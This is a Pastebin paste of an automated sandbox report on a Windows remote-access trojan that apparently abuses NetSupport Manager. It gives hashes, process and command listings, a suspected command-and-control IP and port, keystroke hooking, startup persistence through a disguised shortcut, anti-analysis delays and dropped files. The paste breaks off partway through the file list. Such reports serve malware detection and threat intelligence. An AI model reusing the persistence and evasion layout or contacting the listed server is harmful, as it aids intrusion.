paladin316

rat_29b47d1f3d4417b4e50e5b1c0005298b_exe_2019-07-18_08_30.txt

Jul 18th, 2019
2,413
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.29 KB | None | 0 0
  1.  
  2. * MalFamily: "RAT"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "rat_29b47d1f3d4417b4e50e5b1c0005298b.exe"
  7. * File Size: 6210712
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "aacadf7b3bfc2ac8a9a342e5372c77218efa9c67602c3a15441094170a5f52d4"
  10. * MD5: "29b47d1f3d4417b4e50e5b1c0005298b"
  11. * SHA1: "8c99bbbf3f10ca3a17b66483fd12d05c740e8b72"
  12. * SHA512: "e0be81aec6e029e31171675609ef0cb9a0ccc8ebefe236d94216be6f55930c3875c5f4212d63afe57375e47877078b782457cdde20150f108d34ce07b9f9fa20"
  13. * CRC32: "8DDA17C6"
  14. * SSDEEP: "98304:C2ucSaqk6klTcBu7WoMOfH7fbG5a2nnCHRdhSJTLe6ZRYLIQlrlAN0urueFKJEL:3JJ6klcoBH7fbF2nn++hLe6ssQBAN80h"
  15.  
  16. * Process Execution:
  17. "rat_29b47d1f3d4417b4e50e5b1c0005298b.exe",
  18. "WinSupport.exe",
  19. "client32.exe",
  20. "services.exe",
  21. "svchost.exe",
  22. "WmiPrvSE.exe",
  23. "svchost.exe",
  24. "svchost.exe",
  25. "WMIADAP.exe",
  26. "taskhost.exe",
  27. "sc.exe",
  28. "svchost.exe",
  29. "WerFault.exe",
  30. "wermgr.exe",
  31. "svchost.exe"
  32.  
  33.  
  34. * Executed Commands:
  35. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport.exe -pjf74idD",
  36. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.exe ",
  37. "\"C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\GetUserLang.exe\"",
  38. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\\\StoreInv.exe",
  39. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
  40. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  41. "taskhost.exe $(Arg0)",
  42. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  43. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  44. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  45. "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
  46. "C:\\Windows\\system32\\WerFault.exe -u -p 2916 -s 288",
  47. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\""
  48.  
  49.  
  50. * Signatures Detected:
  51.  
  52. "Description": "At least one process apparently crashed during execution",
  53. "Details":
  54.  
  55.  
  56. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  57. "Details":
  58.  
  59. "IP": "5.45.73.63:4151"
  60.  
  61.  
  62.  
  63.  
  64. "Description": "A process attempted to delay the analysis task.",
  65. "Details":
  66.  
  67. "Process": "client32.exe tried to sleep 357 seconds, actually delayed analysis time by 0 seconds"
  68.  
  69.  
  70. "Process": "svchost.exe tried to sleep 535 seconds, actually delayed analysis time by 0 seconds"
  71.  
  72.  
  73.  
  74.  
  75. "Description": "Starts servers listening on 0.0.0.0:5405",
  76. "Details":
  77.  
  78.  
  79. "Description": "Reads data out of its own binary image",
  80. "Details":
  81.  
  82. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00000000, length: 0x00000007"
  83.  
  84.  
  85. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00000000, length: 0x00002000"
  86.  
  87.  
  88. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00000007, length: 0x001ffff0"
  89.  
  90.  
  91. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00001ff0, length: 0x00002000"
  92.  
  93.  
  94. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00003fe0, length: 0x00002000"
  95.  
  96.  
  97. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00005fd0, length: 0x00002000"
  98.  
  99.  
  100. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00007fc0, length: 0x00002000"
  101.  
  102.  
  103. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00009fb0, length: 0x00002000"
  104.  
  105.  
  106. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0000bfa0, length: 0x00002000"
  107.  
  108.  
  109. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0000df90, length: 0x00002000"
  110.  
  111.  
  112. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0000ff80, length: 0x00002000"
  113.  
  114.  
  115. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00011f70, length: 0x00002000"
  116.  
  117.  
  118. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00013f60, length: 0x00002000"
  119.  
  120.  
  121. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00015f50, length: 0x00002000"
  122.  
  123.  
  124. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00017f40, length: 0x00002000"
  125.  
  126.  
  127. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00019f30, length: 0x00002000"
  128.  
  129.  
  130. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0001bf20, length: 0x00002000"
  131.  
  132.  
  133. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0001df10, length: 0x00002000"
  134.  
  135.  
  136. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0001ff00, length: 0x00002000"
  137.  
  138.  
  139. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00021ef0, length: 0x00002000"
  140.  
  141.  
  142. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00023ee0, length: 0x00002000"
  143.  
  144.  
  145. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00025ed0, length: 0x00002000"
  146.  
  147.  
  148. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00027ec0, length: 0x00002000"
  149.  
  150.  
  151. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00029eb0, length: 0x00002000"
  152.  
  153.  
  154. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0002bea0, length: 0x00002000"
  155.  
  156.  
  157. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0002de90, length: 0x00002000"
  158.  
  159.  
  160. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0002fe80, length: 0x00002000"
  161.  
  162.  
  163. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00031e70, length: 0x00002000"
  164.  
  165.  
  166. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00033e60, length: 0x00002000"
  167.  
  168.  
  169. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00035e50, length: 0x00002000"
  170.  
  171.  
  172. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00037e40, length: 0x00002000"
  173.  
  174.  
  175. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00039e30, length: 0x00002000"
  176.  
  177.  
  178. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0003be20, length: 0x00002000"
  179.  
  180.  
  181. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0003de10, length: 0x00002000"
  182.  
  183.  
  184. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0003fe00, length: 0x00002000"
  185.  
  186.  
  187. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00041df0, length: 0x00002000"
  188.  
  189.  
  190. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00043de0, length: 0x00002000"
  191.  
  192.  
  193. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00045dd0, length: 0x00002000"
  194.  
  195.  
  196. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00047dc0, length: 0x00002000"
  197.  
  198.  
  199. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00049db0, length: 0x00002000"
  200.  
  201.  
  202. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0004bda0, length: 0x00002000"
  203.  
  204.  
  205. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0004dd90, length: 0x00002000"
  206.  
  207.  
  208. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0004fd80, length: 0x00002000"
  209.  
  210.  
  211. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00051d70, length: 0x00002000"
  212.  
  213.  
  214. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00053d60, length: 0x00002000"
  215.  
  216.  
  217. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00055d50, length: 0x00002000"
  218.  
  219.  
  220. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00057d40, length: 0x00002000"
  221.  
  222.  
  223. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00059d30, length: 0x00002000"
  224.  
  225.  
  226. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0005bd20, length: 0x00002000"
  227.  
  228.  
  229. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0005dd10, length: 0x00002000"
  230.  
  231.  
  232. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0005fd00, length: 0x00002000"
  233.  
  234.  
  235. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00061cf0, length: 0x00002000"
  236.  
  237.  
  238. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0009a000, length: 0x00000031"
  239.  
  240.  
  241. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0009a019, length: 0x00552437"
  242.  
  243.  
  244. "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x005ec490, length: 0x00000008"
  245.  
  246.  
  247. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00000000, length: 0x00000007"
  248.  
  249.  
  250. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00000000, length: 0x00002000"
  251.  
  252.  
  253. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00000007, length: 0x001ffff0"
  254.  
  255.  
  256. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00001ff0, length: 0x00002000"
  257.  
  258.  
  259. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00003fe0, length: 0x00002000"
  260.  
  261.  
  262. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00005fd0, length: 0x00002000"
  263.  
  264.  
  265. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00007fc0, length: 0x00002000"
  266.  
  267.  
  268. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00009fb0, length: 0x00002000"
  269.  
  270.  
  271. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0000bfa0, length: 0x00002000"
  272.  
  273.  
  274. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0000df90, length: 0x00002000"
  275.  
  276.  
  277. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0000ff80, length: 0x00002000"
  278.  
  279.  
  280. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00011f70, length: 0x00002000"
  281.  
  282.  
  283. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00013f60, length: 0x00002000"
  284.  
  285.  
  286. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00015f50, length: 0x00002000"
  287.  
  288.  
  289. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00017f40, length: 0x00002000"
  290.  
  291.  
  292. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00019f30, length: 0x00002000"
  293.  
  294.  
  295. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0001bf20, length: 0x00002000"
  296.  
  297.  
  298. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0001df10, length: 0x00002000"
  299.  
  300.  
  301. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0001ff00, length: 0x00002000"
  302.  
  303.  
  304. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00021ef0, length: 0x00002000"
  305.  
  306.  
  307. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00023ee0, length: 0x00002000"
  308.  
  309.  
  310. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00025ed0, length: 0x00002000"
  311.  
  312.  
  313. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00027ec0, length: 0x00002000"
  314.  
  315.  
  316. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00029eb0, length: 0x00002000"
  317.  
  318.  
  319. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0002bea0, length: 0x00002000"
  320.  
  321.  
  322. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0002de90, length: 0x00002000"
  323.  
  324.  
  325. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0002fe80, length: 0x00002000"
  326.  
  327.  
  328. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00031e70, length: 0x00002000"
  329.  
  330.  
  331. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00033e60, length: 0x00002000"
  332.  
  333.  
  334. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00035e50, length: 0x00002000"
  335.  
  336.  
  337. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00037e40, length: 0x00002000"
  338.  
  339.  
  340. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00039e30, length: 0x00002000"
  341.  
  342.  
  343. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0003be20, length: 0x00002000"
  344.  
  345.  
  346. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0003de10, length: 0x00002000"
  347.  
  348.  
  349. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0003fe00, length: 0x00002000"
  350.  
  351.  
  352. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00041df0, length: 0x00002000"
  353.  
  354.  
  355. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00043de0, length: 0x00002000"
  356.  
  357.  
  358. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00045dd0, length: 0x00002000"
  359.  
  360.  
  361. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00047dc0, length: 0x00002000"
  362.  
  363.  
  364. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00049db0, length: 0x00002000"
  365.  
  366.  
  367. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0004bda0, length: 0x00002000"
  368.  
  369.  
  370. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0004dd90, length: 0x00002000"
  371.  
  372.  
  373. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0004fd80, length: 0x00002000"
  374.  
  375.  
  376. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00051800, length: 0x000697ce"
  377.  
  378.  
  379. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x000d073e, length: 0x00000070"
  380.  
  381.  
  382. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x000e242e, length: 0x00000070"
  383.  
  384.  
  385. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x001308ce, length: 0x00000070"
  386.  
  387.  
  388. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0014553e, length: 0x00000070"
  389.  
  390.  
  391. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0015811e, length: 0x00000070"
  392.  
  393.  
  394. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0015a27e, length: 0x00000070"
  395.  
  396.  
  397. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0015c3de, length: 0x00000070"
  398.  
  399.  
  400. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0015e53e, length: 0x00000070"
  401.  
  402.  
  403. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016069e, length: 0x00000070"
  404.  
  405.  
  406. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x001627fe, length: 0x00000070"
  407.  
  408.  
  409. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016495e, length: 0x00000070"
  410.  
  411.  
  412. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00166abe, length: 0x00000070"
  413.  
  414.  
  415. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00168c1e, length: 0x00000070"
  416.  
  417.  
  418. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00168d8e, length: 0x00000070"
  419.  
  420.  
  421. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016cabe, length: 0x00000070"
  422.  
  423.  
  424. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016d03e, length: 0x00000070"
  425.  
  426.  
  427. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016d1ae, length: 0x00000070"
  428.  
  429.  
  430. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0017324e, length: 0x00000070"
  431.  
  432.  
  433. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0017379e, length: 0x00000070"
  434.  
  435.  
  436. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0017680e, length: 0x00000070"
  437.  
  438.  
  439. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0017f0de, length: 0x00000070"
  440.  
  441.  
  442. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0018315e, length: 0x00000070"
  443.  
  444.  
  445. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00188d9e, length: 0x00000070"
  446.  
  447.  
  448. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0018acfe, length: 0x00000070"
  449.  
  450.  
  451. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0029d09e, length: 0x00000070"
  452.  
  453.  
  454. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x002a41de, length: 0x00000070"
  455.  
  456.  
  457. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x002a6cee, length: 0x00000070"
  458.  
  459.  
  460. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x002b84ae, length: 0x00000070"
  461.  
  462.  
  463. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003bcace, length: 0x00000070"
  464.  
  465.  
  466. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003c8f7e, length: 0x00000070"
  467.  
  468.  
  469. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003d4efe, length: 0x00000070"
  470.  
  471.  
  472. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003d6fce, length: 0x00000070"
  473.  
  474.  
  475. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003d8dbe, length: 0x00000070"
  476.  
  477.  
  478. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003dabee, length: 0x00000070"
  479.  
  480.  
  481. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003de07e, length: 0x00000070"
  482.  
  483.  
  484. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003e54be, length: 0x00000070"
  485.  
  486.  
  487. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003e85fe, length: 0x00000070"
  488.  
  489.  
  490. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003fd6fe, length: 0x00000070"
  491.  
  492.  
  493. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00427e9e, length: 0x00000080"
  494.  
  495.  
  496. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0042b53e, length: 0x00000080"
  497.  
  498.  
  499. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0057c35e, length: 0x00000030"
  500.  
  501.  
  502. "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0057c39e, length: 0x00000050"
  503.  
  504.  
  505.  
  506.  
  507. "Description": "A process created a hidden window",
  508. "Details":
  509.  
  510. "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
  511.  
  512.  
  513.  
  514.  
  515. "Description": "Drops a binary and executes it",
  516. "Details":
  517.  
  518. "binary": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.exe"
  519.  
  520.  
  521. "binary": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport.exe"
  522.  
  523.  
  524.  
  525.  
  526. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  527. "Details":
  528.  
  529. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  530.  
  531.  
  532. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  533.  
  534.  
  535. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  536.  
  537.  
  538. "suspicious_request": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm"
  539.  
  540.  
  541. "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
  542.  
  543.  
  544.  
  545.  
  546. "Description": "Performs some HTTP requests",
  547. "Details":
  548.  
  549. "url": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm"
  550.  
  551.  
  552. "url": "http://geo.netsupportsoftware.com/location/loca.asp"
  553.  
  554.  
  555.  
  556.  
  557. "Description": "Sniffs keystrokes",
  558. "Details":
  559.  
  560. "SetWindowsHookExA": "Process: client32.exe(1392)"
  561.  
  562.  
  563.  
  564.  
  565. "Description": "Queries information on disks, possibly for anti-virtualization",
  566. "Details":
  567.  
  568.  
  569. "Description": "Attempts to restart the guest VM",
  570. "Details":
  571.  
  572.  
  573. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  574. "Details":
  575.  
  576. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13453644 times"
  577.  
  578.  
  579.  
  580.  
  581. "Description": "Installs itself for autorun at Windows startup",
  582. "Details":
  583.  
  584. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.lnk"
  585.  
  586.  
  587. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.lnk"
  588.  
  589.  
  590.  
  591.  
  592. "Description": "Creates a hidden or system file",
  593. "Details":
  594.  
  595. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\AudioCapture.dll"
  596.  
  597.  
  598. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\clhook4.dll"
  599.  
  600.  
  601. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.exe"
  602.  
  603.  
  604. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.ini"
  605.  
  606.  
  607. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\Control.kbd"
  608.  
  609.  
  610. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\CryptPak.dll"
  611.  
  612.  
  613. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\DBI.EXE"
  614.  
  615.  
  616. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.dll"
  617.  
  618.  
  619. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.INF"
  620.  
  621.  
  622. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.sys"
  623.  
  624.  
  625. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\HTCTL32.DLL"
  626.  
  627.  
  628. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\IPBR32.DLL"
  629.  
  630.  
  631. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\IPCTL32.DLL"
  632.  
  633.  
  634. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\msvcr100.dll"
  635.  
  636.  
  637. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBBR32.DLL"
  638.  
  639.  
  640. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\Nbctl32.dll"
  641.  
  642.  
  643. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA0.DLL"
  644.  
  645.  
  646. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA1.DLL"
  647.  
  648.  
  649. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA2.DLL"
  650.  
  651.  
  652. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA3.DLL"
  653.  
  654.  
  655. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA4.DLL"
  656.  
  657.  
  658. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA5.DLL"
  659.  
  660.  
  661. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA6.DLL"
  662.  
  663.  
  664. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA7.DLL"
  665.  
  666.  
  667. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nskbfltr.inf"
  668.  
  669.  
  670. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nskbfltr.sys"
  671.  
  672.  
  673. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSM.ini"
  674.  
  675.  
  676. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSM.LIC"
  677.  
  678.  
  679. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nsmexec.exe"
  680.  
  681.  
  682. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nspscr.inf"
  683.  
  684.  
  685. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nspscr.sys"
  686.  
  687.  
  688. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSToast.exe"
  689.  
  690.  
  691. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcicapi.dll"
  692.  
  693.  
  694. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcicfgui.exe"
  695.  
  696.  
  697. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCICHEK.DLL"
  698.  
  699.  
  700. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCICL32.DLL"
  701.  
  702.  
  703. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pciconn.exe"
  704.  
  705.  
